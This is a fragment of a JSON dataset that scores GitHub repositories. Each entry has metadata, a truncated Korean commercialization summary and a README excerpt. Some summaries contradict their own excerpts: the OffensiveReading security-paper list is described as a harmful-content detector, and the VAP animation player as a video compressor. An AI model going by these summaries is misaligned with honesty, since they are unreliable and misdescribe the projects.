src=\"https://img.shields.io/badge/Product%20Hunt-Golden%20Kitty%20Award%202023-yellow\" alt=\"Product Hunt\">\n  </a>\n  <a href=\"https://news.ycombinator.com/item?id=38419513\" target=\"_blank\" rel=\"noopener noreferrer\"\n><img src=\"https://img.shields.io/badge/Hacker%20News-%231-%23FF6600\" alt=\"Hacker News\"></a>\n  <a href=\"https://www.npmjs.com/package/@novu/react\" target=\"_blank\" rel=\"noopener nor","composite_score":0.1718,"license_safety_tag":"unknown"},{"name":"pymc-devs/pymc3","github_url":"https://github.com/pymc-devs/pymc3","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# PyMC3 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 분석 문제를 자동으로 풀어주는 통계 도구로, 금융·의약·과학 분야의 의사결정을 더 정확하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 데이터를 업로드하면 자동으로 시장 동향을 예측해주는 분석 플랫폼\n2. **내부 업무 도구**: 제약회사가 신약 임","readme_excerpt":".. image:: https://cdn.rawgit.com/pymc-devs/pymc/main/docs/logos/svg/PyMC_banner.svg\n    :height: 100px\n    :alt: PyMC logo\n    :align: center\n\n|Build Status| |Coverage| |NumFOCUS_badge| |Binder| |Dockerhub| |DOIzenodo| |Conda Downloads|\n\nPyMC (formerly PyMC3) is a Python package for Bayesian statistical modeling\nfocusing on advanced Markov chain Monte Carlo (MCMC) and variational inference (VI)\nalgorithms. Its flexibility and extensibility make it applicable to a\nlarge suite of problems.\n\nCheck out the `PyMC overview <https://docs.pymc.io/en/latest/learn/core_notebooks/pymc_overview.html>`__,  or\none of `the many examples <https://www.pymc.io/projects/examples/en/latest/gallery.html>`__!\nFor questions on PyMC, head on over to our `PyMC Discourse <https://discourse.pymc.io/>`__ forum.\n\nFeatures\n========\n\n-  Intuitive model specification syntax, for example, ``x ~ N(0,1)``\n   translates to ``x = Normal('x',0,1)``\n-  **Powerful sampling algorithms**, such as the `No U-Turn\n   Sampler <ht","composite_score":0.1716,"license_safety_tag":"unknown"},{"name":"tianshiyeben/wgcloud","github_url":"https://github.com/tianshiyeben/wgcloud","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":1,"description":"# wgcloud 저장소 분석\n\n## 왜 보물인가\n기업의 모든 컴퓨터와 서버 상태를 한눈에 모니터링할 수 있는 통합 관리 시스템으로, 장애 발생을 미리 감지하여 서비스 중단을 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 모니터링 플랫폼으로 여러 기업이 자신의 인프라 상태를 실시간으로 확인\n- **내부 업무 도구*","readme_excerpt":"<p align=\"center\">\n  <a  target=\"_blank\" href=\"http://www.wgstart.com\">\n    <img src=\"./demo/logo.png\">\n  </a>\n </p>\n\n\n\n## WGCLOUD运维监控系统介绍\n\nWGCLOUD设计思想为新一代极简运维监控系统，提倡快速部署，最大限度降低运维的学习难度，全自动化运行，无模板和脚本。\n\n**当前仓库为开源版本v2.3.7最新，二次开发请拉取master分支即可**。\n\nWGCLOUD基于微服务springboot架构开发，是轻量高性能的分布式监控系统，核心采集指标包括：**cpu使用率，cpu温度，内存使用率，磁盘容量，磁盘IO，硬盘SMART健康状态，系统负载，MAC地址，连接数量，网卡流量，硬件系统信息等。支持监测服务器上的进程应用、文件防篡改、端口、日志、DOCKER容器、数据库、数据表等资源。支持监测服务接口API、数通设备（如交换机、路由器、打印机）等。自动生成网络拓扑图，大屏可视化，web SSH（堡垒机），统计分析图表，指令下发批量执行，告警信息推送（如邮件、钉钉、微信、短信等）**。\n\n1.   v2.3.7放弃了之前版本的sigar方式获取主机指标，采用流行的OSHI组件来采集主机指标\n2.   采用服务端和代理端协同工作方式，更轻量，更高效，可支持数千台主机同时在线监控\n3.   server端负责接受数据，处理数据，生成图表展示。agent端默认每隔2分钟(时间可调)上报主机指标数据\n4.   支持主流服务器平台安装部署，如Linux, Windows,macOS,Unix等\n5.   WGCLOUD采用主流技术框架SpringBoot+Bootstrap，完美实现了分布式监控系统，为反哺开源社区，二次开源\n6.   **当前仓库为开源版**\n7.   **商业版请到官网下载（[www.wgstart.com](http://www.wgstart.com)），商业版免费但是不开源，生产环境建议部署商业版本，因为商业版功能更多、性能更优秀、安全性更好、更稳定、版本更新更活跃**\n8.   如果您觉得WGCLOUD帮助到您的工作，那不用打赏我们，star支持下就好了\n9.   关于分享，我们开源的初衷在于分享学习，如果可以的话，请在您","composite_score":0.1715,"license_safety_tag":"safe"},{"name":"aler9/rtsp-simple-server","github_url":"https://github.com/aler9/rtsp-simple-server","stars":10,"language":"Go","license":"MIT","abandonment_months":0,"description":"# aler9/rtsp-simple-server 분석\n\n## 왜 보물인가\nCCTV나 실시간 카메라 영상을 간단하게 스트리밍할 수 있는 도구로, 복잡한 설정 없이 누구나 쉽게 영상을 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 건설사나 매장이 현장 CCTV를 클라우드 기반으로 실시간 모니터링하는 구독형 서비스\n2. *","readme_excerpt":"<h1 align=\"center\">\n  <a href=\"https://mediamtx.org\">\n    <img src=\"logo.png\" alt=\"MediaMTX\">\n  </a>\n\n  <br>\n  <br>\n\n  [![Website](https://img.shields.io/badge/website-mediamtx.org-1c94b5)](https://mediamtx.org)\n  [![Test](https://github.com/bluenviron/mediamtx/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/bluenviron/mediamtx/actions/workflows/test.yml?query=branch%3Amain)\n  [![Lint](https://github.com/bluenviron/mediamtx/actions/workflows/lint.yml/badge.svg?branch=main)](https://github.com/bluenviron/mediamtx/actions/workflows/lint.yml?query=branch%3Amain)\n  [![CodeCov](https://codecov.io/gh/bluenviron/mediamtx/branch/main/graph/badge.svg)](https://app.codecov.io/gh/bluenviron/mediamtx/tree/main)\n  [![Release](https://img.shields.io/github/v/release/bluenviron/mediamtx)](https://github.com/bluenviron/mediamtx/releases)\n  [![Docker Hub](https://img.shields.io/badge/docker-bluenviron/mediamtx-blue)](https://hub.docker.com/r/bluenviron/mediamtx)\n</h1>\n\n<br>\n\n_Medi","composite_score":0.1711,"license_safety_tag":"safe"},{"name":"monkeyWie/gopeed","github_url":"https://github.com/monkeyWie/gopeed","stars":5,"language":"Go","license":"GPL-3.0","abandonment_months":1,"description":"# gopeed 프로젝트 분석\n\n## 왜 보물인가\n파일을 빠르고 안정적으로 내려받을 수 있도록 도와주는 다운로드 도구로, 인터넷 속도가 느린 환경에서도 파일을 효율적으로 받을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 저장소 업체가 자신의 플랫폼에 빠른 다운로드 기능을 추가하여 유료 구독자에게 제공\n2. **내부 업무 ","readme_excerpt":"# [![](_docs/img/banner.svg)](https://gopeed.com)\n\n[![Test Status](https://github.com/GopeedLab/gopeed/workflows/test/badge.svg)](https://github.com/GopeedLab/gopeed/actions?query=workflow%3Atest)\n[![Codecov](https://codecov.io/gh/GopeedLab/gopeed/branch/main/graph/badge.svg)](https://codecov.io/gh/GopeedLab/gopeed)\n[![Release](https://img.shields.io/github/release/GopeedLab/gopeed.svg)](https://github.com/GopeedLab/gopeed/releases)\n[![Download](https://img.shields.io/github/downloads/GopeedLab/gopeed/total.svg)](https://github.com/GopeedLab/gopeed/releases)\n[![Donate](https://img.shields.io/badge/%24-donate-ff69b4.svg)](https://gopeed.com/docs/donate)\n[![WeChat](https://img.shields.io/badge/WeChat%20Official%20Account-07C160?logo=wechat&logoColor=white)](https://raw.githubusercontent.com/GopeedLab/gopeed/main/_docs/img/weixin.png)\n[![Discord](https://img.shields.io/discord/1037992631881449472?label=Discord&logo=discord&style=social)](https://discord.gg/ZUJqJrwCGB)\n\n<a href=\"https://tr","composite_score":0.1705,"license_safety_tag":"restricted"},{"name":"urbanadventurer/WhatWeb","github_url":"https://github.com/urbanadventurer/WhatWeb","stars":20,"language":"Ruby","license":"gpl-2.0","abandonment_months":2,"description":"# WhatWeb 상용화 분석\n\n## 왜 보물인가\n웹사이트가 어떤 기술로 만들어졌는지 자동으로 파악해주는 도구로, 보안 점검이나 시장 조사가 필요한 모든 조직에서 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 기술 분석 플랫폼으로 운영, 기업들이 경쟁사 기술 스택을 파악하는 데 활용\n- **내부 업무 도구**: 보안팀이 자사 ","readme_excerpt":"[![License](https://img.shields.io/badge/license-GPLv2-brightgreen.svg)](https://raw.githubusercontent.com/urbanadventurer/whatweb/master/LICENSE) ![Stable Release](https://img.shields.io/badge/stable_release-0.6.4-blue.svg) ![WhatWeb Plugins](https://img.shields.io/badge/plugins-1824-brightgreen.svg) [![Repositories](https://repology.org/badge/tiny-repos/whatweb.svg)](https://repology.org/project/whatweb/versions)\n\n![logo](https://github.com/user-attachments/assets/57950281-dec2-4132-a166-6387331bfd34 \"WhatWeb Logo\")\n\n# WhatWeb - Next generation web scanner\nDeveloped by Andrew Horton [urbanadventurer](https://github.com/urbanadventurer/) and Brendan Coles [bcoles](https://github.com/bcoles/)\n\nLatest Release: v0.6.4. April 3, 2026\n\nLicense: GPLv2\n\nThis product is subject to the terms detailed in the license agreement. For more information about WhatWeb visit https://github.com/urbanadventurer/\n\nWiki: https://github.com/urbanadventurer/WhatWeb/wiki/\n\nIf you have any questions, comments ","composite_score":0.1703,"license_safety_tag":"restricted"},{"name":"Mogli12/VehicleControlAddon","github_url":"https://github.com/Mogli12/VehicleControlAddon","stars":14,"language":"Lua","license":"unknown","abandonment_months":8,"description":"# VehicleControlAddon 평가 분석\n\n## 왜 보물인가\n게임이나 시뮬레이션에서 차량을 자유자재로 조종할 수 있는 기능을 미리 만들어 놓은 코드 모음으로, 개발자들이 바퀴를 다시 발명하지 않고 바로 사용할 수 있다는 점이 가치입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 플랫폼 (SaaS)**: 인디 게임 개발자들이 구독해서 차량 조","readme_excerpt":"# VehicleControlAddon for Farming Simulator 2025\n\n## Status\n\nFirst FS25 version...\n\n## Developer version\nPlease be aware you're using a developer version, which may and will contain errors, bugs, mistakes and unfinished code. \n\nYou have been warned.\n\nIf you're still ok with this, please remember to post possible issues that you find in the developer version. \nThat's the only way we can find sources of error and fix them. \nBe as specific as possible:\n\n* tell us the version number\n* only use the vehicles necessary, not 10 other ones at a time\n* which vehicles are involved, what is the intended action?\n* Post! The! Log! to [Gist](https://gist.github.com/) or [PasteBin](http://pastebin.com/)\n\n## Known errors, warnings and problems\nMany...\n\n## Newest features\nSnap direction has been renamed to **lane guidance**.\nIt is possible to swtich to left or right reverse guidance lane. Here are the lane guidance key bindings:\n* LCtrl+W: (de-)activate lane  guidane on nearest lane\n* LCtrl+LAlt+W: dete","composite_score":0.17,"license_safety_tag":"unknown"},{"name":"fatih/errwrap","github_url":"https://github.com/fatih/errwrap","stars":120,"language":"Go","license":"NOASSERTION","abandonment_months":14,"description":"","readme_excerpt":"# errwrap [![](https://github.com/fatih/errwrap/workflows/build/badge.svg)](https://github.com/fatih/errwrap/actions)\n\nWrap and fix Go errors with the new **`%w`** verb directive. This tool analyzes\n`fmt.Errorf()` calls and reports calls that contain a verb directive that is\ndifferent than the new `%w` verb directive [introduced in Go v1.13](https://golang.org/doc/go1.13#error_wrapping). It's also capable of rewriting calls to use the new `%w` wrap verb directive.\n\n![errwrap](https://user-images.githubusercontent.com/438920/69905498-26b34c80-1369-11ea-888d-608f32678971.gif)\n\n## Install\n\n```bash\n# minimum v1.16 is required\ngo install github.com/fatih/errwrap@latest\n```\n\nor download one of the [pre-compiled binaries from the releases page](https://github.com/fatih/errwrap/releases/latest) and copy to the desired location.\n\n## Usage\n\nBy default, `errwrap` prints the output of the analyzer to stdout. You can pass\na file, directory or a Go package:\n\n```sh\n$ errwrap foo.go # pass a file\n$ er","composite_score":0.1699,"license_safety_tag":"unknown"},{"name":"wainshine/Chinese-Names-Corpus","github_url":"https://github.com/wainshine/Chinese-Names-Corpus","stars":6,"language":"","license":"apache-2.0","abandonment_months":7,"description":"# Chinese-Names-Corpus 상용화 분석\n\n## 왜 보물인가\n중국어 이름 데이터베이스는 중국 시장을 대상으로 하는 모든 서비스(전자상거래, 금융, 마케팅)에서 필수적인 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **성명 검증 SaaS**: 중국 고객 가입 시 이름이 실제 존재하는 이름인지 자동 검증해주는 웹서비스\n2. **마케팅 플랫폼 API","readme_excerpt":"# 中文人名语料库（Chinese-Names-Corpus）\n\n<strong>关于萌名（NameMoe）</strong>\n\n萌名是一个基于大数据和自然语言处理技术的新取名产品。\n\n通过分词工具对海量文本进行分词和词频统计。数据清洗后，得到千万级的人名词典。再对其进行性别、年龄、拼音、情感、人名指数等标记，最终形成5600万+的中文人名图谱。\n\n本子项目可用于中文分词、人名识别等场景。\n\n---\n\nPS1：维护此项目，除个人兴趣外，主要是在此过程中，可通过任务驱动来不断学习和实践NLP、KG以及AI等相关前沿技术。\n\n<del>PS2：正在找工作，求内部推荐～ 移动医疗/SaaS后台/人工智能方向的 高级产品经理一枚。</del>\n\nPS3：请勿提交涉政issue，谢谢。\n\nPS4：如将本项目转存到国内的某平台，请设置成0积分下载，并保留GitHub链接。\n\n---\n\n<strong>中文常见人名（Chinese_Names_Corpus）</strong>\n\n数据大小：120万。\n\n语料来源：从亿级人名语料中提取。\n\n数据清洗：已清洗，但仍存有少量badcase。\n\n<strong>新增人名生成器。</strong>\n\n---\n\n<strong>中文古代人名（Ancient_Names_Corpus）</strong>\n\n数据大小：25万。\n\n语料来源：多个人名词典汇总。\n\n数据清洗：已清洗。\n\n---\n\n<strong>中文姓氏（Chinese_Family_Name）</strong>\n\n数据大小：1千。\n\n语料来源：从亿级人名语料中提取。\n\n数据清洗：已清洗。\n\n---\n\n<strong>中文称呼（Chinese_Relationship）</strong>\n\n数据大小：5千，称呼词根；18万，中文称呼。\n\n语料来源：多个人名词典汇总。\n\n数据清洗：已清洗，但仍存有大量badcase。\n\n---\n\n# 英文人名语料库（English-Names-Corpus）\n<strong>翻译人名（English_Cn_Name_Corpus）</strong>\n\n数据大小：48万。\n\n语料来源：多个人名词典汇总。\n\n数据清洗：已清洗，但仍存有少量badcase，以地名居多。\n\n本语料的人名识别由网友 “[ltccss](https://github.com/ltc","composite_score":0.1692,"license_safety_tag":"safe"},{"name":"anaibol/awesome-serverless","github_url":"https://github.com/anaibol/awesome-serverless","stars":13,"language":"","license":"GPL-3.0","abandonment_months":3,"description":"# awesome-serverless 분석 보고서\n\n## 왜 보물인가\n서버를 직접 관리할 필요 없이 클라우드에서 자동으로 처리해주는 기술들을 한곳에 모아놓은 실용적인 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 초기 비용 없이 자동 확장되는 웹 애플리케이션(예: 이메일 발송 서비스)을 빠르게 구축\n2. **내부 업무 ","readme_excerpt":"<img src=\"http://i.imgur.com/zq0LJAl.png\" align=\"right\" height=300>\n\n# :cloud: Awesome Serverless\n\nA curated list of awesome services, solutions and resources for serverless / nobackend applications.\n\n***“No server is easier to manage than no server”***\n\n## Table of contents\n\n- [What is \"serverless\" computing?](#what-is-serverless-computing)\n- [All in one solutions](#all-in-one-solutions)\n- [Hosting and code execution in the cloud](#hosting-and-code-execution-in-the-cloud)\n- [Isomorphic Engines](#isomorphic-engines)\n- [Frameworks](#frameworks)\n- [Security](#security)\n- [CI/CD](#cicd)\n- [Cost calculators](#cost-calculators)\n- [Logging / Monitoring / Performance / Tracing](#logging--monitoring--performance--tracing)\n- [Authentication and authorization](#authentication-and-authorization)\n- [IAM](#iam)\n- [Payments](#payments)\n- [eCommerce](#ecommerce)\n- [Content Management Systems](#content-management-systems)\n- [Forms](#forms)\n- [Media management and File storage](#media-management-and-fi","composite_score":0.1691,"license_safety_tag":"restricted"},{"name":"rougier/from-python-to-numpy","github_url":"https://github.com/rougier/from-python-to-numpy","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":13,"description":"# rougier/from-python-to-numpy 분석\n\n## 왜 보물인가\n프로그래밍 입문자가 파이썬에서 시작해 데이터 처리의 핵심 도구인 넘파이로 자연스럽게 전환하도록 도와주는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**: 파이썬 초급자 대상 구독형 강의 플랫폼에 핵심 콘텐츠로 통합\n2. **기업 직무 ","readme_excerpt":"### From Python to Numpy\nCopyright (c) 2017 Nicolas P. Rougier  \n**License**: [Creative Commons Attribution 4.0 International (CC BY-NC-SA 4.0)](https://creativecommons.org/licenses/by-nc-sa/4.0/).  \n**Website**: http://www.labri.fr/perso/nrougier/from-python-to-numpy\n\nThere are already a fair number of books about NumPy\n(see [bibliography](10-bibliography.rst)) and a legitimate question is to\nwonder if another book is really necessary. As you may have guessed by reading\nthese lines, my personal answer is yes, mostly because I think there is room\nfor a different approach concentrating on the migration from Python to NumPy\nthrough vectorization. There are a lot of techniques that you don't find in\nbooks and such techniques are mostly learned through experience. The goal of\nthis book is to explain some of these techniques and to provide an opportunity\nfor making this experience in the process.\n\n![](data/cubes.png)\n","composite_score":0.169,"license_safety_tag":"unknown"},{"name":"BitnomadLive/OffensiveReading","github_url":"https://github.com/BitnomadLive/OffensiveReading","stars":8,"language":"","license":"unknown","abandonment_months":9,"description":"# OffensiveReading 저장소 분석\n\n## 왜 보물인가\n온라인에서 해로운 콘텐츠를 자동으로 찾아내고 분석하는 기술로, 플랫폼 안전 관리와 콘텐츠 모니터링이 필요한 모든 서비스에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 안전 SaaS**: SNS 플랫폼과 커뮤니티 운영사가 악플, 혐오 표현, 허위 정보 자동 감지 서","readme_excerpt":"# OffensiveReading\n\nA collection of papers about offensive IT security with some blogposts sprinkled in. This is basically a list of papers I found interesting. If you want to contribute a paper just open a issue or issue a pull request. \nNote: I started to put AI papers into other categories as well, since its getting used for fuzzing etc now as well\n\n## Table of Contents\n\n1. [Browsers / Browser Side Channel](#browsers--browser-side-channel)\n2. [Vulnerability Discovery - Web](#vulnerability-discovery---web)\n3. [XSS](#xss)\n4. [CSS](#css)\n5. [Web Cache](#web-cache)\n6. [Network](#network)\n7. [Windows](#windows)\n8. [Side Channel Attacks](#side-channel-attacks)\n9. [DNS](#dns)\n10. [AI](#ai)\n11. [Fuzzing / Exploitation / Vulnerability Discovery in Applications/Hardware](#fuzzing--exploitation--vulnerability-discovery-in-applicationshardware)\n12. [Mobile/Radio](#mobileradio)\n13. [IoT](#iot)\n14. [Crypto/DeFi](#cryptodefi)\n15. [BlueTeam](#blueteam)\n16. [Misc/Other](#miscother)\n\n\n## Browsers / B","composite_score":0.169,"license_safety_tag":"unknown"},{"name":"Tencent/vap","github_url":"https://github.com/Tencent/vap","stars":5,"language":"Objective-C","license":"NOASSERTION","abandonment_months":7,"description":"# Tencent/vap 상용화 분석\n\n## 왜 보물인가\n텐센트가 만든 이 기술은 동영상 파일을 매우 작은 용량으로 압축하면서도 화질을 유지할 수 있어, 모바일 앱이나 웹에서 빠르게 영상을 재생할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 동영상 스트리밍 SaaS**\n- 유튜브나 틱톡 같은 쇼츠 플랫폼에 이 압축 기술을 통합하여 저사양 휴대폰","readme_excerpt":"# VAP\n\n[![License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](http://opensource.org/licenses/MIT)\n\n简体中文 | [English](./README_en.md)\n\nVAP（Video Animation Player）是企鹅电竞开发，用于播放酷炫动画的实现方案。\n\n* 相比Webp, Apng动图方案，具有高压缩率(素材更小)、硬件解码(解码更快)的优点\n* 相比Lottie，能实现更复杂的动画效果(比如粒子特效)\n\n\n项目详细介绍请参考 [Introduction.md](./Introduction.md)\n\n\n特效展示：\n\n[展示主页](https://egame.qq.com/vap)\n\n![](./images/anim1.gif)\n\n而且VAP还能在动画中融入自定义的属性（比如用户名称, 头像）\n\n![](./images/anim2.gif)\n\n\n\n## 温馨提示\n\n尊敬的开发者朋友：\n\n感谢您长期以来对本仓库的关注与使用。在此我们郑重说明：本仓库已进入停止维护状态，不会继续更新。\n\n若您需继续使用 VAP 动画播放功能，并期望获得**长期稳定、持续迭代的技术支持**，我们推荐切换至腾讯云官方推出的礼物特效方案：**礼物动画特效**。该服务专为高性能动画播放场景设计，提供：\n\n-  **持续迭代**：长期维护与功能更新。\n- **多端兼容**：全面支持 Android、iOS、Flutter 平台。\n- **企业级保障**：高稳定性、安全性及技术支撑。\n\n腾讯云礼物特效版本旨在解决开源版本维护不足的局限性，可为您（尤其企业用户）提供更可靠的生产环境支持，避免因依赖过期版本带来的潜在风险。\n\n感谢您的理解，欢迎[点击此处](https://cloud.tencent.com/document/product/616/115992)了解礼物动画特效的详细能力与接入指南！\n\n## 性能简述\n\n\n-|文件大小|解码方式|特效支持\n---|---|---|---\nLottie|无法导出|软解|无粒子特效\nGIF|4.6M|软解|只支持8位色彩\nApng|10.6M|软解|全支持\nWebp|9.2M|软解|全支持\nmp4|1","composite_score":0.1688,"license_safety_tag":"unknown"},{"name":"KCORES/KCORES-CSPS-to-ATX-Converter","github_url":"https://github.com/KCORES/KCORES-CSPS-to-ATX-Converter","stars":7,"language":"KiCad Layout","license":"NOASSERTION","abandonment_months":8,"description":"# KCORES-CSPS-to-ATX-Converter 분석\n\n## 왜 보물인가\n컴퓨터 전원 공급 장치의 다양한 규격을 상호 호환되도록 변환해주는 기술로, 하드웨어 제조사와 수리 업체들의 비용 절감과 효율성 향상을 동시에 달성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 컴퓨터 부품 판매 SaaS**\n- 고객들이 호환성 없는 전원 공급 장치를 자신","readme_excerpt":"# KCORES-CSPS-to-ATX-Converter\n\n![KCORES CSPS to ATX Converter](Document/Image/Cover/Cover1.png)\n\n- 项目视频: [1元10瓦 垃圾佬的超级ATX电源-Youtube](https://www.youtube.com/watch?v=Dy0Jgn7Dg4A)\n- KCORES 交流群: [826702309](https://jq.qq.com/?_wv=1027&k=jcr07ZYG)\n- KCORES 官方网站: [KCORES.com](https://kcores.com/)\n- 从零开始制作: [入门指南](Document/Getting_Started_Guide.md)\n\n# Specification\n\n| 12V   | 5V    | 3.3V  | 5VSB  |\n|-------|-------|-------|-------|\n|取决于CSPS| 5A | 5A    | 5A    |\n|       | 25W   | 16.5W | 25W   |\n\n⚠: 5V 与 3.3V 不建议长期超过 4A 使用\n\n## 模组接口\n- 1x 24Pin 主板接口 (巨龙线序)\n- 1x 4Pin IDE/SATA 硬盘接口 (联想线序)\n- 5x 8Pin CPU/GPU 接口 (巨龙线序)\n- 1x I2C PMBUS 控制接口\n\n# Document\n\n## Distinguish CSPS\n\nKCORES CSPS to ATX Converter 可以用于引脚特征如下图所示的电源\n\n![辨别 CSPS 电源](Document/Image/Cover/Distinguish_CSPS.jpg)\n\n目前已知 Hewlett Packard Enterprise 与 Huawei 大量生产过 CSPS (Common Slot Power Supply).  \n不同厂家生产的 CSPS 可能外形略有不同, 但金手指必须与图示一致才可使用.  \n\n## Getting Started Guide\n\n- [入门指南](Document/Getting_Started_Guide.md)\n\n# LICENSE\n\n![KCORES 许可证](http","composite_score":0.1688,"license_safety_tag":"unknown"},{"name":"nschloe/betterbib","github_url":"https://github.com/nschloe/betterbib","stars":7,"language":"","license":"gpl-3.0","abandonment_months":14,"description":"# betterbib 상업화 분석\n\n## 왜 보물인가\n논문이나 책을 쓸 때 참고 문헌을 자동으로 정리해주는 도구로, 학생과 연구자들의 가장 번거로운 작업을 간편하게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학원생과 학부생을 위한 웹 기반 참고문헌 자동 정리 플랫폼으로 운영\n2. **내부 업무 도구**: 대학 도서관과 ","readme_excerpt":"<p align=\"center\">\n  <img alt=\"betterbib\" src=\"https://raw.githubusercontent.com/texworld/betterbib/assets/betterbib.svg\" width=\"60%\">\n</p>\n\n[![PyPi Version](https://img.shields.io/pypi/v/betterbib.svg?style=flat-square)](https://pypi.org/project/betterbib)\n[![PyPI pyversions](https://img.shields.io/pypi/pyversions/betterbib.svg?style=flat-square)](https://pypi.org/pypi/betterbib/)\n[![GitHub stars](https://img.shields.io/github/stars/texworld/betterbib.svg?style=flat-square&logo=github&label=Stars&logoColor=white)](https://github.com/texworld/betterbib)\n\n<!-- [![Downloads](https://pepy.tech/badge/betterbib/month?style=flat-square)](https://pepy.tech/project/betterbib) -->\n<!--[![PyPi downloads](https://img.shields.io/pypi/dm/betterbib.svg?style=flat-square)](https://pypistats.org/packages/betterbib)-->\n\n[![Discord](https://img.shields.io/static/v1?logo=discord&logoColor=white&label=chat&message=on%20discord&color=7289da&style=flat-square)](https://discord.gg/hnTJ5MRX2Y)\n\n> [!NOTE]\n> Se","composite_score":0.1683,"license_safety_tag":"restricted"},{"name":"justinbois/bootcamp","github_url":"https://github.com/justinbois/bootcamp","stars":89,"language":"Python","license":"NOASSERTION","abandonment_months":9,"description":"","readme_excerpt":"","composite_score":0.1683,"license_safety_tag":"unknown"},{"name":"chentsulin/electron-react-boilerplate","github_url":"https://github.com/chentsulin/electron-react-boilerplate","stars":7,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# electron-react-boilerplate 분석\n\n## 왜 보물인가\nWindows/Mac/Linux에서 모두 작동하는 업무용 프로그램을 빠르게 만들 수 있는 기초 틀입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 직원들이 사용하는 데이터 관리, 재무 보고, 일정 관리 프로그램\n- **고객 관리 소프트웨어**: 소규모 비즈니스를","readme_excerpt":"<img src=\".erb/img/erb-banner.svg\" width=\"100%\" />\n\n<br>\n\n<p>\n  Electron React Boilerplate uses <a href=\"https://electron.atom.io/\">Electron</a>, <a href=\"https://facebook.github.io/react/\">React</a>, <a href=\"https://github.com/reactjs/react-router\">React Router</a>, <a href=\"https://webpack.js.org/\">Webpack</a> and <a href=\"https://www.npmjs.com/package/react-refresh\">React Fast Refresh</a>.\n</p>\n\n<br>\n\n<div align=\"center\">\n\n[![Build Status][github-actions-status]][github-actions-url]\n[![Github Tag][github-tag-image]][github-tag-url]\n[![Discord](https://badgen.net/badge/icon/discord?icon=discord&label)](https://discord.gg/Fjy3vfgy5q)\n\n[![OpenCollective](https://opencollective.com/electron-react-boilerplate-594/backers/badge.svg)](#backers)\n[![OpenCollective](https://opencollective.com/electron-react-boilerplate-594/sponsors/badge.svg)](#sponsors)\n[![StackOverflow][stackoverflow-img]][stackoverflow-url]\n\n</div>\n\n## Install\n\nClone the repo and install dependencies:\n\n```bash\ngit clone -","composite_score":0.1681,"license_safety_tag":"safe"},{"name":"IBM/UQ360","github_url":"https://github.com/IBM/UQ360","stars":15,"language":"Python","license":"Apache-2.0","abandonment_months":8,"description":"# IBM/UQ360 상용화 분석\n\n## 왜 보물인가\nIBM이 만든 이 프로젝트는 인공지능 모델의 신뢰성과 안정성을 검증하는 도구로, 기업들이 AI를 안심하고 사용할 수 있게 돕는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 검증 SaaS 서비스**: 은행·보험사가 대출심사 AI나 사기탐지 AI의 신뢰도를 주기적으로 측정하는 월간 구독 서비스","readme_excerpt":"# UQ360\n\n[![Build Status](https://travis-ci.com/IBM/UQ360.svg?branch=main)](https://travis-ci.com/github/IBM/UQ360)\n[![Documentation Status](https://readthedocs.org/projects/uq360/badge/?version=latest)](https://uq360.readthedocs.io/en/latest/?badge=latest)\n\nThe Uncertainty Quantification 360 (UQ360) is an open-source toolkit with a Python package to provide data science \npractitioners and developers access to state-of-the-art algorithms, to streamline the process of estimating, evaluating,\nimproving, and communicating uncertainty of machine learning models as common practices for AI transparency.\nThe [UQ360 interactive experience](https://uq360.res.ibm.com/) provides a gentle introduction to the concepts and \ncapabilities by walking through an example use case. The [tutorials and example notebooks](./examples) offer a deeper,\ndata scientist-oriented introduction. The [complete API](https://uq360.readthedocs.io/) is also available.\n\nWe have developed the package with extensibility in m","composite_score":0.168,"license_safety_tag":"safe"},{"name":"google/syzkaller","github_url":"https://github.com/google/syzkaller","stars":8,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# Google Syzkaller 상용화 분석\n\n## 왜 보물인가\n컴퓨터 소프트웨어의 숨겨진 오류를 자동으로 찾아내는 도구로, 보안 위협을 사전에 차단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 코드 검사 플랫폼으로 기업들이 구독하여 자동으로 소프트웨어 결함을 점검\n2. **내부 업무 도구**: 대형 IT 회사의","readme_excerpt":"# syzkaller - kernel fuzzer\n\n[![CI Status](https://github.com/google/syzkaller/workflows/ci/badge.svg)](https://github.com/google/syzkaller/actions?query=workflow/ci)\n[![OSS-Fuzz](https://oss-fuzz-build-logs.storage.googleapis.com/badges/syzkaller.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?q=label:Proj-syzkaller)\n[![Go Report Card](https://goreportcard.com/badge/github.com/google/syzkaller)](https://goreportcard.com/report/github.com/google/syzkaller)\n[![Coverage Status](https://codecov.io/gh/google/syzkaller/graph/badge.svg)](https://codecov.io/gh/google/syzkaller)\n[![GoDoc](https://godoc.org/github.com/google/syzkaller?status.svg)](https://godoc.org/github.com/google/syzkaller)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](LICENSE)\n\n`syzkaller` (`[siːzˈkɔːlə]`) is an unsupervised coverage-guided kernel fuzzer.\\\nSupported OSes: `FreeBSD`, `Fuchsia`, `gVisor`, `Linux`, 